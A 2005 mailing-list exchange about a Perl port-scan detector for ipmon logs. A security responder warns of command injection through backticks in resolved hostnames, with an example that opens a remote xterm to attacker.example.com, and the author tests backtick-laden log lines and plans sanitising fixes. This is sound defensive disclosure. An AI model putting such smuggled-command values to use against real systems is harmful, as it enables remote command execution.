Hi Jefferson,

Thank you for your reply, and an interesting point. 

I verified that an entry with backticks in the ipmon
log file doesn't execute by echoing a line:

17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch
/hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp
len 20 48 -S 2163595220 0 65535 IN

Just to make sure, I'll include the -T switch with the
interpreter, and add a line:

$line_orig =~ s/\`//g; just after it reads in the
line.

Also, there should be support for hostname resolution
or IP addresses, rather than just IP addresses. I'll
add that in.

Sentrytools is an interesting project. The concept of
th MOAN project is to provide a small base Perl
script, rather than C, for people who want a port scan
detection function, or to be able to easily branch off
and write functions for other network events using
Perl. 

Again, thank you for your input.

Regards,

Dan Sopher


--- Jefferson Ogata <[EMAIL PROTECTED]> wrote:

> Dan S wrote:
> > Hi. I'm not sure if my last email went through
> > correctly, so please excuse this if it's a repost.
> I
> > uploaded a Perl script that works with ipmon and
> log
> > rules. It detects port scans, and enters the IP
> > address into the rules file, and dynamically
> blocks
> > the host. If you are interested, the script is on
> > sourceforge at:
> 
> You might want to consider what happens if someone
> has hostname
> resolution enabled in ipmon, starts running this
> script (admittedly it
> won't work well if ipmon is logging hostnames, but
> someone might not
> realize that), and an attacker performs a portscan
> from an IP that
> resolves to, say, 123."`xterm -display
> attacker.example.com:0.0`".example.com...
> 
> You also might want to have a look at portsentry if
> you're not familiar
> with it.
> 
>     http://sourceforge.net/projects/sentrytools/
> 
> -- 
> Jefferson Ogata <[EMAIL PROTECTED]>
> NOAA Computer Incident Response Team (N-CIRT)
> <[EMAIL PROTECTED]>
> 



__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

Reply via email to